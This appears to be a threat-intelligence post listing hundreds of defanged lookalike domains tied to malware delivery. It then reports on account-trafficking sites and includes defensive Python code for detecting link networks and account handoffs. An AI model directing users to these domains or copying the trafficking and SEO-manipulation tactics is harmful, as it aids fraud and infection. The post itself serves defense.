kuaicheam[.]com
lestvvkpn[.]com
kuaicheem[.]com
lestvvwpn[.]com
lestvvopn[.]com
lestvvupn[.]com
lestvvspn[.]com
aydareklam[.]com
meiqiakefu[.]net
clashrra[.]com
clasheea[.]com
clasheec[.]com
clashees[.]com
clashrrc[.]com
clashrre[.]com
clashttb[.]com
clashtta[.]com
clashttc[.]com
chrome65[.]com
tor-browser[.]cn
tor-project[.]cn
lizengzhi[.]com
kuailianvpnxiazai[.]com
quickqqf[.]com
quickqqi[.]com
quickqqc[.]com
quickqqa[.]com
quickqqb[.]com
quickqqe[.]com
quickqqd[.]com
quickqqj[.]com
quickqqg[.]com
quickqqh[.]com
teleggrammm[.]com
telgeraam[.]com
telgerram[.]com
telgegamm[.]com
telgeranm[.]com
lestvvdpn[.]com
lestvvbpn[.]com
lestvvfpn[.]com
lestvvipn[.]com
lestvvapn[.]com
lestvvcpn[.]com
lestvvgpn[.]com
lestvvepn[.]com
lestvvhpn[.]com
lestvvjpn[.]com
zuqiujingcai[.]cn
teleggaream[.]com
quiqcke[.]com
quiqckc[.]com
quiqcka[.]com
hdktqj[.]cn
hdltdn[.]cn
zh-electrum[.]cn
hfgtpk[.]cn
hlrtfh[.]cn
torbrowser[.]cn
weidaoyou[.]com
title9guy[.]com
zhasang[.]com
dongchuo[.]com
cnmoldmaker[.]com
sddiankeshipin[.]com
clashesm[.]com
clashesn[.]com
clashesd[.]com
quicqker[.]com
quicqkor[.]com
quicqkir[.]com
xiaojiedai[.]com
buylevitrawww[.]com
torproject[.]cn
travel-reviews[.]com
laserdistance[.]com
telegramtcn[.]com
shangpingou[.]com
naxjx[.]com
51lingsheng[.]com
zglian[.]com
tiaojuan[.]com
fywjfang[.]com
ajktzx[.]com
qiasan[.]com
ruihejia[.]com
scyadina[.]com
threadsfind[.]com
yoondao[.]com
yooadao[.]com
youodao[.]com
yaoodao[.]com
youadao[.]com
ggvxlqxk[.]com
rgrvemni[.]com
ruqshjpb[.]com
agydlevy[.]com
urmfirxr[.]com
akozjqjj[.]com
rtoroyua[.]com
deknfmtp[.]com
nfbfeyab[.]com
bbctgkor[.]com
wckzzcln[.]com
vnfmuydn[.]com
xnlnvsnm[.]com
jtscvdnh[.]com
tesrjfqi[.]com
lkcbugrh[.]com
wjywyfht[.]com
vtgeaqvs[.]com
nugepfia[.]com
izvfarqf[.]com
kuaichenn[.]com
kuaichenng[.]com
kuaichemn[.]com
kuaichemm[.]com
kuaichenm[.]com
letsvuvpn[.]com
letsvvvpm[.]com
letsuuvpn[.]com
letsuvvpn[.]com
letsvvvvn[.]com
letszxcvpn[.]com
letsvwvpn[.]com
letsvvvnn[.]com
letsvvvpp[.]com
letsvvvpn[.]com
kuaivvnp[.]com
kuaivnnn[.]com
kuaivppp[.]com
kuaivppnn[.]com
kuaivppn[.]com
kuaivvvvn[.]com
kuaivvnnn[.]com
kuaivwvpn[.]com
kuaivvvpn[.]com
kuaivvvnn[.]com
vpn6[.]cn
whasapp[.]cn
saphagonapps[.]com
letsboppn[.]com
xhj-vpn[.]cn
oy311[.]cn
calshrrh[.]com
calshiiuh[.]com
calshunh[.]com
calshooih[.]com
calshuuh[.]com
calshdhh[.]com
calshhhh[.]com
xhjianvpn[.]com
calshrhh[.]com
xhjvvnpn[.]com
xhjivnvpn[.]com
xhjvvvpn[.]com
kuaicechen[.]com
xhjvwvpn[.]com
clashrsh[.]com
clashesh[.]com
kuaicachen[.]com
klysensor[.]com
sallypickles[.]com
seoiklan[.]com
taklogo[.]com
cbtinbrooklyn[.]com
beklegeliyorum[.]com
chacaraklabin[.]com
reklamagoogle[.]com
michaelklapper[.]com
tahtabisiklet[.]com
web-chrome[.]cn
telgegrame[.]com
quickloans4u[.]com
nepalklubben[.]com
shopfigbrooklyn[.]com
sdmkloire[.]com
nklandscaping[.]com
rocketbacklink[.]com
yesildagnakliyat[.]com
klubdj[.]com
weeklygamejam[.]com
emilyklinepianostudio[.]com
telegrgerm[.]com
letsvvpsv[.]com
telegrmerm[.]com
telegramrm[.]com
telegrxerm[.]com
telegrzerm[.]com
letsvvvsp[.]com
letsvppsn[.]com
letsvppsv[.]com
letsgotrain[.]com
telegroeem[.]com
telegroerm[.]com
telegroetm[.]com
telegroeum[.]com
telegroeom[.]com
telegroenm[.]com
oeokx[.]cn
telegramo[.]cn
telegraaem[.]com
telegraeam[.]com
telegracem[.]com
telegraerm[.]com
telegraenm[.]com
goolgechorme[.]com
gate-zh[.]cn
zh-gateio[.]cn
shdlukj[.]cn
kuaicchen[.]com
kaichenm[.]com
kuaichem[.]com
clashhn[.]com
clashsh[.]com
clsashh[.]com
baiijing[.]com
baijjing[.]com
baijingm[.]com
hellowold95[.]com
hellowold99[.]com
letsvvmp[.]com
letsnmpn[.]com
letsevvmp[.]com
letsvvppm[.]com
letseppn[.]com
letsppnn[.]com
levvvnnp[.]com
lsteppnn[.]com
letsvvvn[.]com
letspppn[.]com
letsvbnn[.]com
letspnvv[.]com
letsppnm[.]com
lesvvvpn[.]com
letsvppm[.]com
lestesvpn[.]com
letswpm[.]com
lesttvpn[.]com
lestepm[.]com
letsvvnn[.]com
zhchrome[.]cn
chromem[.]cn
chromecn[.]cn
letsviipn[.]com
reefhoteleilat[.]com
listgdp[.]com
saklimdasin[.]com
linkleech[.]net
kristalklaket[.]com
huikuaiche[.]com
mgintech[.]com
deeplyu[.]com
deeplqw[.]com
deeplwe[.]com
deeplty[.]com
deeplrt[.]com
deepseasecurity[.]com
mdeeb[.]com
deepdivedivingcenter[.]com
hellowold888[.]com
hellowold999[.]com
hellowold555[.]com
hellowold666[.]com
michelletuckerinternational[.]com
hellowold222[.]com
hekourenjia[.]com
valueshells[.]com
hellhathno[.]com
revsmarttech[.]com
deepwaterworship[.]com
hellarise[.]com
deepbass[.]net
hbklnb[.]com
backlinkmate[.]com
laurenmerkley[.]com
electrologyoklahoma[.]com
iklanutama[.]com
3klangrecords[.]com
tickletickletickle[.]com
omaha4g[.]com
pendikliler[.]com
healthbiweekly[.]com
swapbuckler[.]com
savporno[.]com
klinespeak[.]com
sidhivpharma[.]com
mgssys[.]com
52diaocha[.]com
telgearam[.]com
wpscee[.]com
yoodaofy[.]com
wahapps[.]com
wahastapp[.]com
okwallet[.]cn
sh-chrome[.]com
jordanwalker[.]net
silkypearl[.]com
fmnorfolk[.]com
volkcaravellethailand[.]com
telegasram[.]com
telegxzram[.]com
telegxcram[.]com
telegvcram[.]com
quiacqk[.]com
telegzxram[.]com
clashnn[.]com
quisckq[.]com
quixcqk[.]com
clashcs[.]com
pickledproductions[.]com
karyaiklan[.]com
exklusive-artikel[.]com
attacklive[.]com
catherinekluge[.]com
klipspringerhouse[.]com
davessprinklerrepair[.]com
hoteltaipa[.]com
nemalababaklopoty[.]com
falkenbergsrasfjaderfaklubb[.]com
feixiahao[.]com
aiconzh[.]com
damaiwang08[.]cn
ssrsvpn[.]com
execvpn[.]net
evevpn[.]com
letsmmvpn[.]com
quiqqkc[.]com
chromegglcn[.]com
quiqqck[.]com
quiccqk[.]com
telggearm[.]com
quikkcq[.]com
tellgegarm[.]com
quicqkq[.]com
ladenvpn[.]com
quikkqc[.]com
xhjvvpn[.]com
chromeglcn[.]com
telgegearm[.]com
chromegcn[.]com
signnnal[.]com
quiicqk[.]com
quiackq[.]com
skypeexe[.]com
telggearam[.]com
signnaal[.]com
signnaall[.]com
chromegcnh[.]com
quiecqk[.]com
teelgearm[.]com
chromeggch[.]com
skypenc[.]com
tellgeram[.]com
tellggearm[.]com
quiscqk[.]com
quiqcqk[.]com
guanfangkuailian[.]org
hfdthw[.]cn
hgltmn[.]cn
hscwlr[.]cn
dibzls[.]cn
zh-tradingview[.]cn
hlxtts[.]cn
dusku[.]online
zh-google[.]cn
ydao24[.]pro
yiwaiwai4[.]pro
guanfangkuailian[.]com
eyy13585[.]vip
tyuj234[.]xyz
imtiokon[.]com
imteikon[.]com
imtoikon[.]com
helloworld688[.]com
goagchrome[.]com
eyy8520[.]com
yooodao[.]com
okpaykol[.]com
kuailianletsvpn[.]org
imteeken[.]com
letspovpn[.]com
eyy2550[.]com
eyy2555[.]com
letsnmvpn[.]com
letssdvpn[.]com
letsvbvpn[.]com
letshjvpn[.]com
letsdfvpn[.]com
letscvvpn[.]com
letsxcvpn[.]com
letshkvpn[.]com
letsbmvpn[.]com
letsfgvpn[.]com
letsghvpn[.]com
letsahvpn[.]com
kuailian14[.]com
kuailian18[.]com
kuailian15[.]com
kuailian12[.]com
kuailian13[.]com
letsqwvpn[.]com
letstyvpn[.]com
kuailian17[.]com
kuailian16[.]com
letsrtvpn[.]com
letsuivpn[.]com
letswevpn[.]com
lets333vpn[.]com
kuailianvpn333[.]com
lets222vpn[.]com
lets999vpn[.]com
lets444vpn[.]com
lets666vpn[.]com
lets888vpn[.]com
lets777vpn[.]com
lets555vpn[.]com
kuailianvpn444[.]com
lets111vpn[.]com
kuailianvpn777[.]com
kuailianvpn1111[.]com
lets000vpn[.]com
kuailianvpn888[.]com
kuailianvpn2222[.]com
kuailianvpn555[.]com
kuailianvpn999[.]com
kuailianvpn666[.]com
kuailianvpn000[.]com
letsvpnop[.]com
letsvpner[.]com
letsvpnty[.]com
letsvpnio[.]com
letsvpnrt[.]com
letsvpnwwe[.]com
letsvpnqw[.]com
letsvpnyu[.]com
letsvpnui[.]com
letsvpnpa[.]com
letsvpn[.]lat
kuailian003[.]com
kuailian006[.]com
kuailian002[.]com
kuai04vpn[.]com
lets01vpn[.]com
kuailian004[.]com
lets02vpn[.]com
kuailian005[.]com
lets03vpn[.]com
lets04vpn[.]com
lets05vpn[.]com
kuai02vpn[.]com
kuai03vpn[.]com
kuai01vpn[.]com
kuai05vpn[.]com
irawc[.]cn
eyyej[.]cn
xrvdj[.]cn
vqxgs[.]cn
kuai3lian[.]com
kuai2lian[.]com
kuai1lian[.]com
kuai4lian[.]com
kuai5lian[.]com
lets11vpn[.]com
lets22vpn[.]com
lets33vpn[.]com
lets55vpn[.]com
lets44vpn[.]com
uxepr[.]cn
bzcrh[.]cn
iehpj[.]cn
zirhs[.]cn
pehby[.]cn
ibwtr[.]cn
eiqip[.]cn
ojply[.]cn
vglzd[.]cn
zuwlf[.]cn
vymip[.]cn
ozunv[.]cn
euaij[.]cn
azedg[.]cn
jqizv[.]cn
jvspq[.]cn
cibnj[.]cn
zfdfo[.]cn
kuaivpn777[.]com
kuaivpn666[.]com
kuaivpn999[.]com
letsvpn222[.]com
kuailian777[.]com
kuaivpn1[.]com
kuailian88[.]com
kuailian999[.]com
letsvpn444[.]com
letsvpn333[.]com
letsvpn555[.]com
kuailian668[.]com
kuaivpn555[.]com
kuaivpn4[.]com
letsvpn111[.]com
kuaivpn2[.]com
kuaivpn3[.]com
kuaivpn5[.]com
kuaivpn888[.]com
kuailian555[.]com
vkksc[.]cn
fliia[.]cn
fpewl[.]cn
kglbt[.]cn
sunraes[.]top
dfrub[.]cn
eatcg[.]cn
efcbh[.]cn
yxdxu[.]cn
unbcp[.]cn
vqbda[.]cn
nvlow[.]cn
steih[.]cn
azwmp[.]cn
letsppvv[.]com
letsnnn[.]com
letsddd[.]com
kuailian55[.]com
letsvvvv[.]com
kuailian44[.]com
letsllp[.]com
kuailian66[.]com
kuailian33[.]com
kuailian11[.]com
letsddvpn[.]com
letsggvpn[.]com
letsffvpn[.]com
letsiivpn[.]com
interparklogistics[.]com
66fj5[.]xyz
93va5[.]xyz
88nf1[.]xyz
44jw2[.]xyz
62ht6[.]xyz
18js8[.]xyz
letsvpncn[.]com
eyy258[.]com
chromegooch[.]com
fanyiyodao[.]com
telgearm[.]com
gmailgoole[.]com
wpssss[.]com
letsvpnnv[.]com
finalshell[.]cn
wpseee[.]com
letsrrvpn[.]com
letsllvpn[.]com
letshhvpn[.]com
qiuckqc[.]com
qiucqk[.]com
qiuqck[.]com
aisii4[.]com
todssk[.]com
todseks[.]com
todkes[.]com
imtuken[.]com
24gx6[.]xyz
44mu8[.]xyz
eyydowgm[.]com
eyydowm[.]com
eyykowm[.]com
eyydowz[.]com
eyydowr[.]top
xingcaiyinlong[.]com
zghjxh168[.]com
faribu[.]com
msklb[.]com
boatdeepcreeklake[.]com
keyklaw[.]com
kloewoman[.]com
shmingtao[.]com
fanshu8[.]net
zgfzzc[.]net
yuwtrde[.]buzz
eyydowom[.]xyz
eyydowi[.]xyz
zahjeaw[.]top
fazmake[.]top
nzaraw[.]top
znmakaf[.]top
makwtga[.]top
kznarfs[.]top
abwradk[.]top
zakermur[.]top
nahrewa[.]top
shazamr[.]top
nkawzae[.]top
letservpn[.]com
letsstvpn[.]com
letsbnvpn[.]com
letsvmvpn[.]com
letwwvpn[.]com
letstsvpn[.]com
letsvnvpn[.]com
acu97[.]cn
letszxvpn[.]com
awnliua[.]top
letsasvpn[.]com
hbgad[.]cn
letsssvpn[.]com
letsccvpn[.]com
letsaavpn[.]com
qdpmo[.]cn
udnucloud[.]com
letsbbvpn[.]com
letseevpn[.]com
letsttvpn[.]com
letsvpnpm[.]com
letsvpnvn[.]com
tokonim[.]com
fkaoq[.]top
fkooq[.]top
fkwoq[.]top
telegrm[.]cn
eyy255[.]com
eyy205[.]com
chromeggad[.]com
letsgvp[.]com
letsvvvnp[.]com
letsppvpn[.]com
kuailianwpn[.]com
letesvvpn[.]com
kuailianppvn[.]com
letsnnpvn[.]com
kuaivnp[.]com
letppvpn[.]com
letyyvpn[.]com
letfvvpn[.]com
letovvpn[.]com
letszvvpn[.]com
letxvvpn[.]com
letlvvpn[.]com
chromegoggl[.]com
0ray[.]cn
imtokonm[.]com
imtokom[.]com
letsvpnb[.]com
letsvpna[.]com
teiegrm[.]cn
buleyy[.]buzz
sineyy[.]buzz
mitucka[.]com
cheapchom[.]xyz
letsvpn[.]cn
letsvpne[.]com
lsetvvpn[.]com
ccbb122[.]com
kuaifanguanfang[.]org
kuaifanguanfang[.]com
kuaifangf[.]com
kuaifanguanwang[.]com
afdesede[.]xyz
hoipq[.]cn
cgdqg[.]cn
oevcb[.]cn
yukkm[.]cn
fbsen[.]cn
golchrome[.]com
vpupi[.]cn
utfpi[.]cn
zxywe[.]cn
tfewr[.]cn
wfekj[.]cn
qiecre[.]live
qvokj[.]cn
wuskj[.]cn
meiqianen[.]buzz
zyzmg[.]cn
meiqiapp[.]icu
kwjee[.]cn
ghdmxti[.]cn
dldvjf[.]cn
affeyy[.]buzz
nsebuy[.]cn
meicia[.]com
lstenvp[.]com
lsetpvn[.]com
lesttpn[.]com
lestgvpn[.]com
dianbaotg[.]store
letesvnp[.]com
speedsvpn[.]com
thzxmr[.]cn
letrpvn[.]com
lestnvp[.]com
lestpvn[.]com
todsek[.]com
todesks[.]com
letsgpn[.]com
marmeiq[.]xyz
qiemeato[.]com
meitoqia[.]app
winnrayr[.]top
yyaa9[.]buzz
yyaa7[.]buzz
letmvpn[.]com
yiwaiwaicselw[.]icu
meiqianc[.]buzz
kuailiao[.]org
yourman[.]mom
iefbp[.]cn
eyynly[.]xyz
meiqia[.]store
letspvn[.]com
lestcpn[.]com
jhtbj[.]mom
ghdhj[.]mom
hredhb[.]mom
sddjkg[.]mom
fhrtdh[.]mom
dgrghn[.]mom
shabdus[.]com
gjfkjgri[.]mom
lettsvpn[.]com
starlinkvpn[.]cn
miqialt[.]com
nejiwks[.]com
levtspn[.]com
womil[.]cn
letlvpn[.]com
kuailian[.]tv
mtrangqia[.]com
meiiqa[.]com
fkgds[.]com
uuu78[.]cn
xbshangcheng[.]vip
chgools[.]xyz
grhd[.]xyz
yww92[.]buzz
letsppn[.]com
meiqal[.]com
mieiarqia[.]com
weimqaia[.]xyz
kuailianguanfang[.]org
latsvpn[.]com
letovpn[.]com
meimq[.]cyou
letrvpn[.]com
letgvpn[.]com
vpn234[.]com
kuikell[.]com
letxvpn[.]com
letavpn[.]com
eyy252[.]com
kuai10[.]com
meiqea[.]com
kuailiat[.]xyz
letzvpn[.]com
fastsvpn[.]com
checkaso09[.]com
checkaso04[.]com
checkaso01[.]com
checkaso6[.]com
letshvpn[.]com
eyye[.]club
huwnag[.]com
eeeym[.]com
web3-corgi[.]world
meiqla[.]com
shanjiabao[.]top
meiqai[.]com
eyy66[.]com
uduncloud[.]icu
hellowold88[.]com
vip5005[.]com
okxym[.]com
letspn[.]com
lettvpn[.]com
whsatsapp[.]top
whasasapp[.]top
dyks68[.]com
letsxvpn[.]com
meiqiaapp[.]com
wahtsaipp[.]com
whasitsapp[.]com
siengl[.]com
kuailian[.]website
eyyche[.]buzz
letvspn[.]com
letsmvpn[.]com
whats-sapp[.]com
getmonero[.]net[.]cn
letsvpn[.]win
xhonghua[.]cn
xiaohongh[.]com
hppayplop[.]com
hppayolap[.]com
www[.]upc-ube[.]com
upcube[.]cc

IOCs on GitHub

If the community has any additional input, please let us know.

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/CNMalwareDelivery-Pt2

Account Trafficking Websites in December 2024

This report examines the illicit online trade of aged and verified accounts for platforms like social media, email, and Google Ads. These accounts, often obtained through hacking or phishing, are valuable for bypassing security and leveraging established trust. They fuel a range of activities, from grey-area marketing tactics to serious crimes like fraud and disinformation, highlighting a significant security risk and a growing challenge in the digital landscape.

Details

In December 2024, over 100 newly registered domains were observed hosting websites that claim to sell pre-verified and aged accounts. These additions to the growing illicit market cover accounts on a range of platforms, including social media, email providers, cloud services, and advertising networks such as Google Ads. The marketplaces cater to demand for pre-existing, reputable digital identities, often acquired through illicit means such as data breaches, phishing scams, or account takeovers.

Buyers are drawn to these accounts for a variety of reasons, primarily the ability to bypass security measures and leverage the established trust associated with older or verified profiles. While some may employ these accounts for seemingly innocuous purposes like gaining an edge in social media marketing or accessing region-locked content, a significant portion fuels malicious activities, including spam campaigns, fraud, disinformation dissemination, and even more nefarious operations. 

This investigation examines recently configured domains and websites in the ecosystem of these account markets, the types of accounts traded, and the techniques used to drive traffic to the sites.

Cloud and BHW Accounts

Based on domain registration overlaps, the following three domains were likely created by the same actor. The websites advertise cloud accounts from top providers as well as ads accounts, Apple developer accounts, Google Voice accounts, and payment gateway accounts such as Amazon Pay and Cash App. The sites claim the accounts are pre-verified and that customers are granted full access to them.

  • IP ISP: Hostinger International Limited
  • IP Country: US
  • Website Title contains all: buy, account

topcloudacc[.]com
acctrusted[.]com
buybhwaccounts[.]xyz

Domain `topcloudacc[.]com` purports to sell AWS, Cloud, Ads, and other accounts.

Website Title: “Buy AWS Account | Best 32-vCPU & Credit Account - 2025”

Domain `acctrusted[.]com` purports to sell cloud accounts for AWS, Azure, Vultr, DigitalOcean and others.

Website Title: “Buy AWS Accounts | Best Vcpu & Credit Account For Sale 2024”

Domain `buybhwaccounts[.]xyz` purports to sell AWS, Google Cloud, Oracle, Digital Ocean, Ads Accounts, and BHW accounts.

Website Title: “Buy BHW Accounts - BHW Accounts For Sale - buybhwaccounts[.]xyz”

Domain `isp-rebellion[.]com` purports to sell Apple 2FA Accounts.

Website Title: “Apple 2FA Accounts for Sale”

Social Media Accounts for Sale

Domain `regularpva[.]com` purports to sell a variety of social media, email and dating accounts such as Facebook, Instagram, Gmail, Outlook, Twitter, and Yahoo. 

Website Title: “Buy Social Media Accounts - Social Media Pages for Sale - SecurePVA”

Domain `shiftxchange[.]biz` purports to be a marketplace for buying and selling social media accounts among other alleged service offerings.

Website Title: “Social Media Accounts for Sale”

Domains `twitterxarena[.]com` and `redditarena[.]com` both redirect to `discordarena[.]com` and purport to sell premium aged social media accounts, including Discord and Reddit accounts.

Website Title: “Premium Aged Discord Accounts for Sale | Discord Arena”

Domain `redditaccsbuy[.]com` purports to sell aged Reddit accounts.

Website Title: “Reddit Accounts with Karma for Sale | Buy Verified, Aged Reddit Accounts Instantly | Affordable Reddit Account Marketplace”

Examining One Such Network: Aged Google Ads Accounts for Sale

Over 100 identical websites were created in December 2024 purporting to sell aged Google Ads accounts and invite codes to illicit marketplaces. For awareness, buying or selling Google Ads accounts violates Google's terms of service. Aged accounts may be perceived as carrying more authority, or as less likely to be flagged for suspicious activity, which makes them attractive to those trying to game the platform.

Registration Overlaps:

  • Registrar: Dynadot LLC
  • Name Server: cloudflare.com
  • Server Type: Cloudflare
  • IP ISP: Cloudflare, Inc.
  • Domain Name or Website Title contains: google ads or adwords

During December 2024, 128 domains were identified with nearly identical domain registration details, and all of them served nearly identical website content. The sites link to illicit marketplaces, such as credit card number verification and acquisition services and illicit Russian markets. Each site also carries multiple links to the other domains in the set, so that all 128 domains direct traffic to one another.

This pattern of interconnected links is characteristic of search engine optimization (SEO) manipulation. Given the illicit content of the sites, the network may exist solely to build backlinks to a main "money site" and so manipulate its search ranking, a structure typically referred to as a private blog network (PBN). PBNs can be an effective SEO manipulation technique because search engines such as Google treat backlinks as a signal of authority: the more backlinks, the higher the ranking. A PBN attempts to inflate that signal artificially to drive traffic to the main site. Search engine providers may penalize both the network and the main site by lowering their rankings or removing them from search results entirely.
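The cross-linking signal described above can be measured directly from crawled pages. The following Python is an added example, not DomainTools tooling or anything taken from the sites themselves: it extracts outbound links from each candidate site's HTML, computes how densely the candidate set links to itself, and ranks the hosts outside the set by how many members link to them, which is where a "money site" surfaces. The HTML and the `*.example` domain names are constructed for the example; the function and variable names are the example's own.

```python
"""Cross-link analysis for a suspected private blog network (PBN).

Added example; not DomainTools code. The pages and the *.example domains
below are constructed sample data, not observed infrastructure.
"""
from collections import Counter
from html.parser import HTMLParser
from itertools import permutations
from urllib.parse import urlparse


def refang(domain: str) -> str:
    """Convert the defanged 'example[.]com' notation used in reports to a hostname."""
    return domain.replace("[.]", ".").strip().lower()


def normalize_host(host: str) -> str:
    """Lower-case a hostname and drop a leading 'www.' so aliases collapse."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


class _LinkExtractor(HTMLParser):
    """Collect the hostname of every absolute <a href> on a page."""

    def __init__(self) -> None:
        super().__init__()
        self.hosts: set[str] = set()

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        href = dict(attrs).get("href") or ""
        host = urlparse(href).hostname  # None for relative links such as /contact
        if host:
            self.hosts.add(normalize_host(host))


def outbound_hosts(html: str) -> set[str]:
    """Return the set of hosts a page links out to."""
    parser = _LinkExtractor()
    parser.feed(html)
    return parser.hosts


def analyze_network(pages: dict[str, str]) -> dict:
    """pages maps a candidate domain (defanged or not) to the HTML it serves.

    density: fraction of ordered (a, b) member pairs where a links to b.
             1.0 means every site links to every other site in the set.
    external_targets: hosts outside the set, ranked by how many member
             sites link to them. A PBN's "money site" sits at the top.
    """
    links = {refang(d): outbound_hosts(h) for d, h in pages.items()}
    members = set(links)
    pairs = list(permutations(sorted(members), 2))
    hits = sum(1 for a, b in pairs if b in links[a])
    density = hits / len(pairs) if pairs else 0.0
    external: Counter = Counter()
    for hosts in links.values():
        for host in hosts - members:
            external[host] += 1
    return {
        "members": len(members),
        "density": round(density, 3),
        "external_targets": external.most_common(),
    }


# Constructed sample: four look-alike storefronts that all link to one another
# and all point at the same hypothetical "money site"; one also links to a
# hypothetical invite-code page. Not real data.
SAMPLE_SITES = ["shop1[.]example", "shop2[.]example",
                "shop3[.]example", "shop4[.]example"]


def _page(others: list[str], externals: list[str]) -> str:
    anchors = "".join(f'<li><a href="https://www.{o}/">Buy aged ads accounts</a></li>'
                      for o in others)
    promos = "".join(f'<p><a href="{u}">Partner</a></p>' for u in externals)
    return (f"<html><body><h1>Buy Aged Ads Accounts</h1>{promos}<ul>{anchors}</ul>"
            '<a href="/contact">Contact</a></body></html>')


def build_sample_pages() -> dict[str, str]:
    pages = {}
    for site in SAMPLE_SITES:
        others = [refang(o) for o in SAMPLE_SITES if o != site]
        externals = ["https://cards-market.example/verify"]
        if site == "shop1[.]example":
            externals.append("https://invite-codes.example/")
        pages[site] = _page(others, externals)
    return pages


if __name__ == "__main__":
    result = analyze_network(build_sample_pages())
    print(f"{result['members']} members, cross-link density {result['density']}")
    for host, n in result["external_targets"]:
        print(f"  {n} member sites link to {host}")
```

A density near 1.0 across a hundred-plus domains that share a registrar and hosting fingerprint is the PBN signature; an organic set of competitors rarely links to every other member. The top external target is the site to watch for abuse reporting, since it is the one the network exists to promote.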

Example Google search results for Google Ads accounts for sale:

Conclusion

The illicit market for aged and verified accounts across social media, email, and advertising platforms is a persistent and evolving threat. Resold accounts are often acquired through illegitimate means, or through account farming and reselling. Aged and pre-verified accounts provide a foundation for a spectrum of illicit and grey-area activities, from spam campaigns and fraud, to hosting malicious resources on cloud providers under obscured ownership, to manipulating online discourse.

This activity underscores the need for stronger security measures and robust verification processes by platform providers. Detecting and mitigating account handoff behaviors, such as suspicious login patterns or unusual activity spikes, is crucial to preventing the resale and abuse of verified accounts. Marketing and sales teams should also exercise heightened vigilance when encountering accounts with seemingly high engagement or suspicious activity: aged or re-verified accounts may appear more legitimate, but their origins should be carefully scrutinized.
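One way a platform could operationalize the account-handoff detection the paragraph calls for, as an added Python example rather than a control described by the page or implemented by any named platform. The event format, the indicator set and the thresholds (90 days of dormancy, five actions within 24 hours, three indicators coinciding) are assumptions chosen for illustration, and the log lines are constructed. The idea is that a single indicator is ordinary (travel, a new phone, a long break) while several coinciding on an old account is the pattern of an account that has just changed hands.

```python
"""Heuristic detection of account handoff (an aged account changing hands).

Added example, not a platform's actual control. Indicators, thresholds and
log format are assumptions; the log below is constructed sample data.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

DORMANCY = timedelta(days=90)        # assumed: idle at least this long before the login
BURST_WINDOW = timedelta(hours=24)   # assumed: window in which to count actions
BURST_MIN_ACTIONS = 5                # assumed: actions in the window that count as a spike
MIN_INDICATORS = 3                   # assumed: how many indicators must coincide to flag


@dataclass
class Event:
    ts: datetime
    account: str
    kind: str      # "login" or "action" (post, ad created, message sent, ...)
    country: str
    device: str    # stable device/browser identifier


def parse_log(lines) -> list[Event]:
    """Parse 'ts,account,kind,country,device' lines; skip blanks and comments."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, account, kind, country, device = (f.strip() for f in line.split(","))
        events.append(Event(datetime.fromisoformat(ts), account, kind, country, device))
    return sorted(events, key=lambda e: e.ts)


def detect_handoffs(events: list[Event]) -> list[dict]:
    """Flag logins where dormancy, a new country, a new device and an
    activity burst coincide. History is built per account as it is replayed,
    so each login is judged only against what the account did before it."""
    by_account: dict[str, list[Event]] = defaultdict(list)
    for e in events:
        by_account[e.account].append(e)

    findings = []
    for account, evs in by_account.items():
        seen_countries: set[str] = set()
        seen_devices: set[str] = set()
        last_login = None
        for i, e in enumerate(evs):
            if e.kind != "login":
                continue
            indicators = []
            if last_login is not None and e.ts - last_login >= DORMANCY:
                indicators.append(f"dormant {(e.ts - last_login).days}d")
            if seen_countries and e.country not in seen_countries:
                indicators.append(f"new country {e.country}")
            if seen_devices and e.device not in seen_devices:
                indicators.append(f"new device {e.device}")
            actions = sum(1 for x in evs[i + 1:]
                          if x.kind == "action" and x.ts - e.ts <= BURST_WINDOW)
            if actions >= BURST_MIN_ACTIONS:
                indicators.append(f"{actions} actions within 24h")
            if len(indicators) >= MIN_INDICATORS:
                findings.append({"account": account, "login_at": e.ts.isoformat(),
                                 "indicators": indicators})
            seen_countries.add(e.country)
            seen_devices.add(e.device)
            last_login = e.ts
    return findings


# Constructed sample log (not real data). acct_a shows the handoff pattern;
# acct_b is a traveller on a known device; acct_c returns from a long break
# on its usual device and country. "ZZ" is a placeholder country code.
SAMPLE_LOG = """
# ts,account,kind,country,device
2024-06-01T10:00:00,acct_a,login,US,dev-1
2024-06-01T10:05:00,acct_a,action,US,dev-1
2024-06-15T09:00:00,acct_a,login,US,dev-1
2024-12-10T03:00:00,acct_a,login,ZZ,dev-9
2024-12-10T03:01:00,acct_a,action,ZZ,dev-9
2024-12-10T03:02:00,acct_a,action,ZZ,dev-9
2024-12-10T03:03:00,acct_a,action,ZZ,dev-9
2024-12-10T03:04:00,acct_a,action,ZZ,dev-9
2024-12-10T03:05:00,acct_a,action,ZZ,dev-9
2024-12-10T03:06:00,acct_a,action,ZZ,dev-9
2024-12-01T08:00:00,acct_b,login,US,dev-2
2024-12-05T08:00:00,acct_b,login,DE,dev-2
2024-12-05T08:10:00,acct_b,action,DE,dev-2
2024-03-01T12:00:00,acct_c,login,US,dev-3
2024-12-01T12:00:00,acct_c,login,US,dev-3
2024-12-01T12:05:00,acct_c,action,US,dev-3
2024-12-01T12:06:00,acct_c,action,US,dev-3
"""


def run_sample() -> list[dict]:
    return detect_handoffs(parse_log(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f['account']} at {f['login_at']}: " + "; ".join(f["indicators"]))
```

Only acct_a is flagged: it went quiet for about six months and then reappeared from a new country, on a new device, immediately producing a burst of actions. acct_b (new country only) and acct_c (dormancy only) each trip one indicator and stay below the threshold, which is the point of requiring several to coincide.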

Proactive threat intelligence, increased awareness among users and businesses, and collaborative efforts between platforms, law enforcement, and cybersecurity researchers are essential to combat the acquisition and exploitation of these compromised accounts, which continue to undermine the integrity and trustworthiness of the digital landscape.

Appendix

Google Ads Account domains related by overlapping registration and hosting details
adwordsad[.]cv
adgoogle[.]cv
googlead[.]cv
adgoogle[.]my
googlead[.]my
googleadwords[.]biz
adgoogle[.]shop
adsgoogle[.]tube
googleadwords[.]tube
googlead[.]best
adgoogle[.]blog
googlead[.]shop
adgoogle[.]best
adgoogle[.]cyou
googlead[.]co
googleadwords[.]bond
adgoogle[.]qpon
adgoogle[.]sbs
adgoogle[.]pro
googleadwords[.]lol
googlead[.]cheap
adgoogle[.]me
googlead[.]asia
googlead[.]vip
adsgoogle[.]lat
adgoogle[.]help
googlead[.]pro
googleadwords[.]help
googlead[.]lat
adgoogle[.]click
googlead[.]info
